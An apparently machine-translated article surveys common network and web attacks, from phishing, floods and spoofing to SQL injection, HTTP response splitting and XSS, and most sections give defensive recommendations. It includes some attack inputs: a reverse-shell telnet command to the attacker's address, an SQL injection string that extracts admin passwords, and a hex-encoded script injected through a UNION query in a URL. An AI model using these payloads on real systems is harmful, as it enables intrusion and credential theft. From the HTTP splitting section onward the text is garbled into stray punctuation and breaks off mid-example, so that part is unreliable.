Common security threats

Everyone probably knows that there are so many different ways of endangering security. They are really enough, how many they will learn by reading under the cut.


All the links used below are taken as an example if they lead somewhere not in the wrong direction to the afftor of pritenzy not to present

The same article is available at: forxakep.ucoz.ru/publ/3-1-0-16
forum.netall.ru/index.php?showtopic=125182&st=0&p=1573116&#entry1573116
www.inattack.ru/article/402.html

Fishing (or Phishing).

Very broad concept. Its meaning is to get information from users (passwords, credit card numbers, etc.) or money. This technique is directed not at one user, but at many. For example, letters allegedly from technical support services are sent to all known customers of a bank. The letters usually contain a request to send a password to the account, allegedly due to some technical work. Despite the fact that users are warned that none of the workers can demand such information, and this information should not be disclosed, there are always those who are happy to “give” their numbers, passwords and so on. Such letters are usually very believable and well-written, which, perhaps, captivates gullible users. It is necessary to make a reservation that there are several tricks for phishing, besides letters. Some of the techniques below, when properly applied, are suitable for phishing (as a rule, we mention this when describing the technique).
Recommendations: Remember that paranoia is the best defense. Do not trust anything suspicious, do not give your data to anyone. Administrators do not need to know your password if it is intended to access their server. They completely control the server and can see the password themselves or change it.

')

Social engineering

Not technical, but psychological reception. Using the data obtained during the inventory, the hacker can call any user (for example, a corporate network) on behalf of the administrator and try to find out from him, for example, the password. This becomes possible when, in large networks, users do not know all the workers, and even more so they cannot always recognize them by phone. In addition, complex psychological techniques are used, so the chance of success greatly increases.
Recommendations: the same. If there really is a need, then give the necessary data personally. In the event that you write down the password on paper, do not leave it anywhere and destroy it as much as possible, rather than just throw it in the trash.

Viruses.

The most common problem known to the user. The essence of the introduction of a malicious program in the user's computer. The consequences can be different and depend on the type of virus with which the computer is infected. But in general - from stealing information to sending spam, organizing DDoS attacks, as well as gaining complete control over the computer. In addition to the file attached to the letter, viruses can get into the computer through some OS vulnerabilities, which are described in our article “Windows Vulnerability Rating”. There are a great many viruses, but it is still possible to classify them. We do not want to reinvent the wheel, so you can use the information on this page school8.uriit.ru/people/av/class.html where the virus classification with a description is given. In more detail this topic is disclosed here fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm
Recommendations: Use antivirus software. Do not limit yourself to only DrWEB or Kaspersky Anti-Virus (because they do not check the registry), use specialized antivirus software against Malware, such as Ad-Aware, SpyBot, XSpy. And also do not open suspicious attachments and do not open programs from unknown senders at all. Even if the sender is familiar to you, anyway, first check the antivirus. Here, as in medicine, it is easier to avoid than to cure.

DoS (Denial of Service or Denial of Service).

I wanted to say that this is rather not a separate attack, but the result of an attack; used to disable the system or individual programs. To do this, the hacker forms a request to a program in a special way, after which it ceases to function. A reboot is required to return the working state of the program. Often there is the opinion that DoS is the same as an attack of type Flood and that in general you need to combine all the attacks that lead to the failure of the system under the general name DoS. It is worth mentioning that:

- There is no general terminology, there are rather unspoken rules by which an attack is classified, therefore even within the framework of this article we will cite a somewhat conventional classification.
- As we have already said, not only Flood, but, for example, Buffer Overflow, as well, can lead to a denial of service.

Therefore, DoS can be characterized as the result of an attack. For example: “the effect of denial of service is achieved by the use of a Flood attack”.

Flood (Flood or Stream / Flooding)

This type is quite controversial, in part it can be attributed to the DoS, but we would like to highlight it separately. From a certain number of machines (in this case, the attack will be called DDoS Distributed Denial of Service. Distributed denial of service attack), as a rule Zombies send the maximum possible number of requests to the victim (for example, connection requests). From this, the victim does not have time to respond to each request, and as a result does not respond to user requests, i.e. it can be said that it ceases to function normally. Note: this type of attack can be called hooliganism, for example, when forums are filled with a large number of meaningless messages. The following types of flood can be distinguished:

--SYN Flood - Flooding the attacked computer with SYN type packets. As you know, a computer must respond to such a packet with a SYN / ACK packet. If there are too many SYN packets, then the computer does not have time to respond to everyone and cannot receive packets from other computers.
--ICMP Flood or Ping Flood - Same, only ICMP packets. The system must respond to such a packet, thereby creating a large number of packets that reduce the performance (throughput) of the channel.
--Identification Flood (Ident Flood). It is similar to ICMP Flood, but the response to a request for port 113 of the identd type takes more time from the system, so the attack is more effective.
--DNS Flood - the attack is directed to the DNS server. They are flooded with DNS requests that the server does not have time to respond to, so it will not be able to respond to your requests. As a result, you will not be able to visit the Internet sites.
--DDoS DNS - The attack is quite new, and we did not meet the "well-established" name. In fact, this technique is about the same as the previous one, with the only difference that requests come from a large number of machines (the previous type does not exclude this). The address to which the DNS server should respond to these requests is equal to the address of the DNS server itself, i.e. it is not only flooded with DNS queries, but it also sends them to itself. Thus, the reception is more effective than the previous one, but also more difficult to implement.
--Boink (Bonk, Teardrop) - A huge number of highly fragmented packets are sent to the victim, but at the same time large fragments. For each fragmented packet, a special buffer is allocated, into which other fragments will be placed later, in order to later put them together. A huge number of large fragments overflow buffer and can cause a freeze or crash.
--Pong - the same as any other of the above types, the only difference is that the sender's address is fake. This gives the hacker some anonymity.

Recommendations: for each OS or router; they are usually given in the technical documentation. Do not neglect them, clearly limit the number of valid packets. Unfortunately, some species cannot be reflected by anything other than a physical shutdown. Properly configured firewalls (or firewalls) are often a panacea.

Smurf (attack against TCP-IP protocol implementation errors)

Now this type of attack is considered exotic, but earlier, when the TCP-IP protocol was quite new, it contained a number of errors that allowed, for example, to replace IP addresses. However, this type of attack still applies. Some experts distinguish TCP Smurf, UDP Smurf, ICMP Smurf. Of course, such a division is based on the type of packages.
Recommendations: CISCO switches provide good protection, like many others, as well as newer software and firewalls; need to block broadcast requests.

Ping-of-Death (or Jolt, SSPing)

The attack is that the victim is sent a fragmented ICMP packet, but the fragment size is very large (64kB). Older OS versions, such as Windows 95, are hanging. This attack can be carried out using the Shadow Security Scanner program.
Recommendations: the easiest way to upgrade the OS, abandoning the old version.

UDP Storm (UDP storm)

It is used if at least two UDP ports are open on the victim, each of which sends some reply to the sender. For example, port 37 with the server time on request sends the current date and time. The hacker sends a UDP packet to one of the ports of the victim, but indicates the address of the victim and the second open UDP port of the victim as the sender. Then the ports start to endlessly respond to each other, which reduces performance. The storm will stop as soon as one of the packets disappears (for example, due to resource overload).
Recommendations: if possible, eliminate the use of services that accept UDP packets, or cut them off from the external network by a firewall.

UDP Bomb

The attacker sends a UDP packet with incorrect service data fields to the system. Data can be broken as you please (for example, incorrect field length, structure). This may lead to crash.
Recommendations: update software.

Land

The victim is sent a packet to a specific port, but the sender's address is set to the same as the victim, and the port of the sender is equal to the port of the recipient. (example: receiver: 1.1.1.1 port 111 sender: 1.1.1.1 port 111). The victim is trying to establish a connection with himself, causing the system to hang. Such an attack can also be 100% effective against some routers.

Mail Bombing

If the attacked computer has a mail server, then a huge number of email messages are sent to it in order to disable it. On the one hand, it resembles Flood, but on the other hand, if the messages contain large attachments that will be scanned by the server anti-virus, then a similar check of many incoming attachments can significantly reduce performance or negate it. In addition, such messages are stored on the hard disk of the server and may overflow it, which can cause DoS. Of course, now this attack is more a story, but in some cases it can still be used.
Recommendations: competent setting of the mail server.

Sniffing (sniffing or audition network)

In the event that hubs are installed in the network instead of switches, the received packets are sent to all computers on the network, and then the computers determine whether this packet is for them or not. If an attacker gains access to a computer that is included in such a network, or gains access to the network directly, then all information transmitted within the network segment, including passwords, will be available. The burglar simply puts the network card into listening mode and will accept all packets, regardless of whether they were intended. It can be used as console sniffers, for example TcpDump (built into * NIX systems), WinDump (for Windows, but not built-in), as well as with a visualized interface, for example Iris.
Recommendations: use switches instead of hubs, encrypt traffic.

IP Hijack (IP Hijack)

If there is physical access to the network, the hacker can “crash” into the network cable and act as an intermediary in the transmission of packets, thereby he will listen to all traffic between two computers. A very inconvenient method that often does not justify itself, except in cases where no other method can be implemented. Such inclusion is inconvenient in itself, although there are devices that simplify this task a little, in particular, they keep track of the numbering of the packets in order to avoid failure and possible detection of channel intrusion. This method is used to defraud ATMs, but such a case is technically more difficult, because it is unacceptable to break the connection between the bank and the ATM, and “plunging” into the channel without breaking it is a task only for a highly qualified specialist. In addition, now ATMs are installed much better, which excludes the possibility of free physical access to the cable.

Recommendations: watch access to cables, for example, use a box. Encrypt traffic.

Dummy ARP (False ARP)

The ARP server, router, or switch knows which IP addresses belong to MAC addresses (i.e., network cards). With the possibility of physical access to the network, an attacker can fake an ARP response and impersonate another computer on the network by obtaining its IP. Thereby, all packages destined for that computer will be received by him. This is possible if that computer is turned off, otherwise this action will cause a conflict of IP addresses (on the same network there cannot be 2 computers with the same IP address).
Recommendations: use software that informs about the change of MAC addresses from IP, watch for the ARP server log files.

Dummy DNS Server (fake DNS Server)

If the network settings are set to automatic, then when you turn on the network, the computer “asks” (that is, sends a broadcast packet) who will be its DNS server to which it will later send DNS requests. With physical access to the network, an attacker can intercept such a broadcast request and respond that his computer is a DNS server. After that, he will be able to send a deceived victim on any route. For example, the victim wants to go to the bank’s website and transfer the money; the attacker can send it to his computer, where the password entry form will be fabricated. After that, the password will belong to the cracker. Quite a difficult way, because the hacker must answer the victim before the DNS server.

Recommendations: if possible, restrict access to the network of outsiders.

Fuzzy (Fuzzy)

Filters can be configured to block certain types of packets, such as UDP. A hacker can fabricate a packet so that the filter does not understand that this UDP packet does not filter it, and it will get to its intended purpose. Thus, a cracker can bypass packet filters. This technique is very narrow and is intended for special cases, more precisely, those when the connection does not have to be two-way. Two-way communication will be impossible in most cases, because basically, if incoming packets of a certain type are blocked on a port, outgoing ones are blocked. It turns out that even if the fabricated packet passes through a filter (for example, on a UDP port), the server will respond to it with a packet of the same type, i.e. UDP, but he will not fabricate it following the example of a cracker. So this outgoing packet will be filtered out and will not get to the cracker. Anyway, it is still worth protecting yourself from such attacks.
Recommendations: usually new versions of firewalls provide sufficient protection against this technique.

Puke

The cracker fabricates an ICMP unreachable response (remote system error), which causes the client to disconnect from the server. It is used rather as an aid in the event that any client should be disconnected from the server in order to conduct an attack.
Fake unreachable - the cracker fabricates a message stating that the package cannot be delivered (unreachable), thereby making the server think that the client has failed and the packages are not delivered to the destination. This can cause the server to disconnect the client. It is also an aid, similar to # 17, only directed not to the client, but to the server.

IP-Spoofing (Spoofing or IP Address Substitution)

The attacker replaces your real IP with a dummy. This is necessary if only certain IP addresses have access to the resource. A hacker needs to change his real IP to “privileged” or “trusted” in order to gain access. This method can be used differently. After the two computers have established a connection with each other by checking the passwords, the attacker can cause network resources to be overloaded with specially generated packets on the victim. Thus, it can redirect traffic to itself and thus bypass the authentication procedure.
Recommendations: there may be a lot of them, for the reason that there are a lot of receptions. But it is worth mentioning that the threat will reduce (but it may make it difficult for legitimate connections) to reduce the response packet time with the SYN and ACK flags set, and also to increase the maximum number of SYN requests for establishing a connection in the queue (tcp_max_backlog). You can also use SYN-Cookies.
Host spoofing. A very complex technique that requires physical access to the network. Each computer knows the router to which it sends all the packets that are then delivered to the destination by the router. When the router is changed, a redirect notification is sent to each computer, after which the computers begin to send packets to the new router. A cracker can fabricate a similar notification and impersonate a router, so he will gain control of traffic within a network segment.
Recommendations: control over access to the network and the moment of change of the router. For example, you can monitor whether all past traffic (i.e., old connections) “appeared” on a new router.

Password selection.

Used for registration in the system by selecting a password for the account. There are two types: selection of all possible combinations of characters (BruteForce) and selection by dictionary. The first method is more effective, because anyway, there is a combination of characters that you entered from the keyboard as a password, but this method is extremely slow, especially if punctuation marks are taken into account, etc. The second method is quick, but if you enter a word that cannot be in the dictionary, for example: “My-New-Password”, then it will be impossible to select it using the dictionary. There are a lot of programs that serve for selecting a password, so we do not think that it makes sense to call any specific ones. As a rule, programs, OS, etc., store passwords in encrypted form, so even if an attacker has access to the file, he will have to decrypt the password. He can do this for days on his home computer.
Recommendations: use complex passwords, better with punctuation. Limit the number of attempts to enter a password. Against decrypting the password will only help its complexity.

Back Connect / Pipes / Reverse (Reverse Session or Reverse)

This is an auxiliary device, but in itself it is very interesting. For example, a hacker does not want to perform many actions for the sake of a single command each time. He can simplify the task using this technique. Its essence is that a hacker forces the computer being attacked to connect to the hacker's computer. For example, on the attacked computer, you can execute the telnet command [ip.adres. Hacker] [port]. After that, the hacker actually receives the command line (command shell or Shell / Shell) on the attacked computer.

Software vulnerabilities

The use of bugs in software. The effect may be different. From receiving insignificant information to gaining complete control over the system. Attacks through software bugs are the most popular at all times. Old errors are corrected by new versions, but new errors appear in new versions, which can again be used. Next we describe not the types of attacks, but the techniques used to attack software errors. Recommendations: we give it at once for everyone, because the recommendation is general - only the “safely” written code of programs will help. On this topic you can find a large amount of material on the Internet.

Buffer Overflow (Buffer Overflow)

A very dangerous type of attack, when a request is formed in such a way that it overwhelms the memory frames allocated to it and the commands “stitched” into the request are put on the stack, and then executed by the processor. This can be done both remotely and locally, if the attacker can run his program on the computer being attacked. This can be used both for executing code on a computer and for elevating rights. There are several sub-types of buffer overflow attacks. We will not describe each of them, because To explain the principle, we will have to give examples of code that will be incomprehensible to people unfamiliar with programming. The following classification belongs to Andrei Kolischak (andr [at] sandy.ru) and is in his article “Attacks on Buffer Overflow”. Therefore, you can find their description, examples and recommendations directly in this article. We give them just for reference.

--- Attack “stack failure”
--- Attack “stack failure” with parameterization
--- Attack “stack failure” with control transfer
--- Distortion of function pointers
--- Attack on function pointers
--- Attack on function pointers with parameterization
--- Attack on function pointers with control transfer
--- Distortion of transition tables
--- Attack on conversion tables
--- Attack on conversion tables with parameterization
--- Attack on transition tables with control transfer
--- Distortion of data pointers
--- Attack with distorted data pointers
--- Attack with the distortion of data pointers with parameterization
--- Attack with the distortion of data pointers with the original code.

We would like to give one more type to the above classification: Integer Overflow (Integer Overflow). For more information, see the article “Integer Overflow: Attack” and “Integer Overflow: Protection” or “Basic Integer Overflows” by Blexim.

Shatter

A vulnerability in Windows systems that can only be exploited locally. It is very similar to a buffer overflow, more precisely it leads to the same result: the attacker's commands are put on the stack. Based on the fact that each window in Windows, which has a field for input, there is a maximum length of the input value. It is set at the development stage of the program and for small fields it can be equal, for example, 50. From the keyboard, you can not enter the number of characters greater than 50, but the windows are based on Messages. You can easily get a Header (Header or Header (special, OS only)) input fields and send a SETTEXT (set text) message (using this header) to an input field. The message should say that it is necessary to set the text longer than 50, respectively, everything that comes after the 50th character will go on the stack and will be executed by the processor. There is no protection against this. The only panacea is AMD Athlon 64 processors, which have built-in protection, and they do not execute commands from the stack.

Nuke (WinNuke or Nyuk)

Now it is rather a story. Windows defaults to using the NetBIOS protocol for sharing files and printers on a network. For this, the OS opens three TCP ports (137, 138, 139). The implementation of this protocol on older versions of Windows contained a vulnerability. The bottom line is that you can send several OutOfBand “messages” in a row to the open 139 port. The system could not process such data correctly and the system hung. A lot of programs for such attacks have been written, but we will only mention the Shadow Security Scanner, which we have already named before, as a tool for SSPing.

Cross User Attack (interuser attack)

In our opinion, quite an ambiguous name, since not in the best way reflects the essence of the attack, but still we adhere to this well-known name. Squid 2.4 and ISA / 2000 allow users to share TCP connections with the server. It is possible to provoke with the help of HRS (described below) two responses from the server, one of which will be monitored by the hacker and falsify the information received by the user.
Attack on CGI. Most WWW (Web) servers use scripts to provide users with additional services or to provide additional features. For example, mail servers, like mail.ru. Many servers have “self-defined” CMS (Content Management System or Content Management Systems (site)) installed. Programmers do not always force their scripts to check user-entered values, which makes it possible to use such errors for various purposes. The buffer overflow attack can also be carried out through CGI script errors. For example: http: // host / cgi-bin / helloworld? Type = A * 100 (i.e. the letter A will be in the amount of 100 times). At http://www.opennet.ru/base/sec/linux_sec_guide.txt.html you can find an excellent article, the second part of which describes security issues that are usually ignored by CGI programmers. Many are not hacking techniques, but only help hacking, so for writing good code it is better to get acquainted with the article. The framework of this article does not allow us to delve into the topic of writing safe code, so we only say that we need to, at a minimum, filter all service characters from the data received.

SQL Injection (SQL injection)

If user input is used in generated SQL queries without validation, then a cracker can enter data that will allow him to get any information from your SQL databases. For example: there is a query "SELECT login, password FROM members where email = '$ email';" Where $ email is entered by the user in the table, the request is processed and the result is displayed on the page. A hacker can modify the data and enter into the form: "my@mail.ru 'OR login LIKE'% admin%". Thus, the generated SQL query will be: “SELECT login, password FROM members where email='my@mail.ru 'OR login LIKE'% admin% ';”. Thus, the hacker will receive passwords from users whose login contains the admin.

HRS (HTTP Resource Splitting)

Quite young and in our opinion a complex technique (if you do not use it only for XSS), which allows you to implement attacks like Hijacking Pages, Cross User Defacement, Web Cache Poisoning, Browser Cache Poisoning, XSS (which will be described below). The essence of the attack is that a hacker with a specially prepared HTTP request can force the Web server, which is vulnerable to HRS, to respond to the victim (and not the hacker) with two separate HTTP responses (and not one, as it would be in a normal situation). HTTP , ! , , . - , - (, - ). But! HTTP ( ) HTTP ( )! , , «» - , ( ). , , , , , cookie . , HRS, , HRS.

Cross User Defacement

«» , , – . – . , HRS. , IP , -, «» . .

Web Cache Poisoning

, , . , , , , -. , . , , .
Browser Cache Poisoning. , . , Web Cache Poisoning, , .

Hijacking Pages

, «» , -, , -, . , , . . , TCP ( «»), TCP («») TCP - («»). :

--- «» ( «») , - «» «1» «2» ( HRS).
--- «» «» -.
---- «1» «2» «».
— , «1» «» «».
--- «» «». «», .
--- «» - «», «2» -.
--- «» «2» «».
— «2» «».
— - «» «».
--- «2» - «», «» «2».
— «» «». So , , .

, , . , , , . , , , , .

CSS/XSS (Cross-Site Scripting )

, Microsoft , Java Script . , Java , «» , . , . , cookie . , . , cookie ! : «», snf.jpg, document.cookie . , , , (, ), «» cookie, . , , ( , JPG) . , (: «photo.jpg») JAVA . XSS, , Java Script . , .

SiXSS (SQL Injection Cross Site Scripting)

SQL Injection XSS, .. XSS SQL Injection. , MySQL ( 0) . , SQL , «» «3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E». SQL Injection , : www.victim.com/vuln_script.php ? vuln_variable=1+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2
F7363726970743E , vuln_variable vuln_script , . SiXSS, , . , . , . XSS , . , , «» , , « ». , , , SQL , «UNION», : , . , %F1%F1%FB%EB%EA%E0 , . , , . , , , SQL . , , , JAVA. . , , «» «Apex Bank PLC», apexbnkplcc@yahoo.co.uk , , . !

SiHRS (SQL Injection HTTP Resource Splitting)

The technique implements HTTP Resource Splitting via SQL Injection script vulnerability. This becomes possible if the script, for example, by index, first accesses the SQL database for the HTTP address, and then generates its own HTTP request and uses the HTTP address obtained from the SQL database to substitute its HTTP request in the Location: field. This is quite often used in Internet site directories. We can give an example of an HTTP header that can be used for SiHRS in hexadecimal.
Code Select HEX ('i.php'
Content-Length: 0

HTTP / 1.1 200 OK
Content-ty